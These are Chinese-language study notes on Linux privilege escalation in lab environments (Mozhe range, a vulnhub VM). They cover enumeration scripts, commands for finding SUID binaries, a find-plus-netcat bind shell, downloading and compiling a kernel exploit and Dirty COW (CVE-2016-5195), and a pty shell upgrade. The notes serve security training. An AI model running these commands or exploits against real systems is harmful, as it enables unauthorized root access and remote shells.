1.Linux信息收集:
Linux 提权自动化脚本 4个脚本(这几个项目都可以在github找到):
- 两个信息收集:LinEnum,linuxprivchecker
- 两个漏洞探针:linux-exploit-suggester ,linux-exploit-suggester2
1)LinEnum:通过webshell等权限将脚本上传到/tmp目录然后执行即可(这个目录是一个临时目录,重启后会清空,一般是可以进行读写的,上传其他目录可能会因为权限不够而失败)。
2)Linuxprivchecker:是一个python文件,前期要收集服务器是否能够运行python文件。
/tmp chmod +x LinEnum #给予文件执行权限
3)linux-exploit-suggester与linux-exploit-suggester2,也是上传上去执行来探测漏洞。
Linux提权SUID配合脚本演示—(Aliyun基于web环境权限提权)
先了解下什么是Linux的suid:https://www.cnblogs.com/zhaoyunxiang/p/15073025.html
漏洞成因:chmod u+s :调用suid用户给予我们s权限(可执行文件权限); suid u-s 删除权限 ;suid使程序在运行中受到了 suid root 权限的执行过程导致。
suid提权漏洞原文出处
提权过程:探针是否有SUID(手工或脚本)-特定SUID利用-利用吃瓜-GG。
以下命令的作用是判断是否有SUID提权的可能性:
find / -user root -prem -4000 -print 2>/dev/null
find / -prem -u=s -type f 2>/dev/null
find / -user root -prem -4000 -exec ls -ldb { } \;
上传探针查看有无suid提权以及查看webshell的权限,有则可以利用(我们也可以利用冰蝎后门来反弹shell到我们的msf服务器上利用,选择Metepreter,在MSF上按照冰蝎显示出来的命令敲,点击"给我连".)
查看suid下文件有无可利用处,find可以提权。最后的find xiaodi -exec netcat -lvp 5555 -e /bin/sh \;命令提权。
Linux提权本地配合内核漏洞演示-Mozhe(本地环境权限下,即普通用户连上的计算机而非webshell用户)Ubuntu16.04漏洞复现
过程:连接(本地用户建立连接)-获取可利用漏洞-下载或上传EXP-编译 EXP-给权限执行-GG
练习:墨者靶场
连接上去我们根据uid编号知道是普通用户,普通组:
perl命令(是linux的语言解释程序)执行我们上传上去的探针,编号与靶场标题对应:
普通用户没有权限读取flag:
利用exp,下载上传并编译:
gcc 45010.c -o 45010
chmod +x 45010
./45010
拿到root权限,注意此漏洞webshell无法提权,必须本地才行:
Linux 提权脏牛内核漏洞演示-linux-exploit-suggester(CVE-2016-5195)
何为脏牛漏洞:
vulnhub 靶机-探针目标-CMS 漏洞利用-脚本探针提权漏洞-利用内核提权-GG
内核漏洞提权过程:寻可用地方-下exp-上/tmp-编译 exp-执行(无权限用 chmod)
案例:vulnhub靶机
桥接模式,同一网段,nmap扫描nmap 192.168.0.0/24,开放了两个端口:
扫描所有端口nmap -p 1-65535 192.168.0.102 扫到1898端口:
nmap常见命令
看下网站我们看到底部drupal的cms,可以网上查找相关漏洞,或者msf查找:
尝试利用漏洞并拿到权限,最终拿到web权限。
想要提权就上传探针,chmod +x 1.sh给没有权限的执行文件赋予权限,运行文件,有cve-2016-5195即脏牛(dirtycow)漏洞,可以wget直接下expwget https://www.exploit-db.com/download/40611 但该网站下载的都是无后缀文件,没法直接利用,所以直接gtihub上下载exp上传上去:
上传编译exp并且由于有交互式,我们需要用python来伪造交互式界面:
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow
拿到root,查找flag(玩vulnhub靶机真有趣):
msf基础使用及实战
更多提权Linux方法(见《Linux提权提权手法总结》):
